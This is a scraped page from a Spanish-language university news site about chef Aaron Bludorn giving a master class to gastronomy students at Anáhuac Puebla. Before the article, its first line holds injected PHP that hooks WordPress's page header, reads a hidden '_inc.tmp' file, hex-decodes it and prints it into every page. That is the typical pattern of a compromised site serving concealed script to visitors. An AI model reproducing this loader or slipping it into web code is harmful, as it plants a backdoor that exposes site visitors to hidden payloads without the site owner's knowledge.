if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } EL Chef Aaron Bludorm de The Final Table imparte Cátedra en la Anáhuac Puebla – La Opinión Universitaria La Opinión Universitaria
Menu

EL Chef Aaron Bludorm de The Final Table imparte Cátedra en la Anáhuac Puebla

 

+ Para los alumnos de Gastronomía nuevos conocimientos

Aaron Bludorn, chef Ejecutivo de Café Boulud en Nueva York y participante en la serie de Netflix “The Final Table” impartió una Cátedra Prima para los alumnos de la Licenciatura en Gastronomía – Le Cordon Bleu – de la Universidad Anáhuac Puebla, donde compartió su experiencia e interpretación culinaria.

A través de anécdotas como chef en diferentes restaurantes y su influencia vanguardista con raíces francesas, el experto transmitió a los jóvenes la importancia de la alta calidad en la cocina y tener una mente abierta al aprendizaje continuo.

Por su parte, el Dr. Javier Ruiz Hermoso, Director de la Escuela de Turismo y Gastronomía de la Anáhuac Puebla, destacó que “la cultura culinaria poblana se está consolidando en el mundo como un referente y cada vez tiene mayor exposición internacional. La gastronomía es un lenguaje con el que se comunican las culturas y se fomenta el entendimiento entre naciones”.

Es por eso que en la Universidad Anáhuac buscamos que nuestros estudiantes reciban una alta preparación profesional aunado a la formación integral. Mediante la visita de invitados de prestigio internacional como Aaron Bludorn, impulsamos el carácter global de los programas académicos.

 

  • No comments

    Deja una respuesta

    Tweets recientes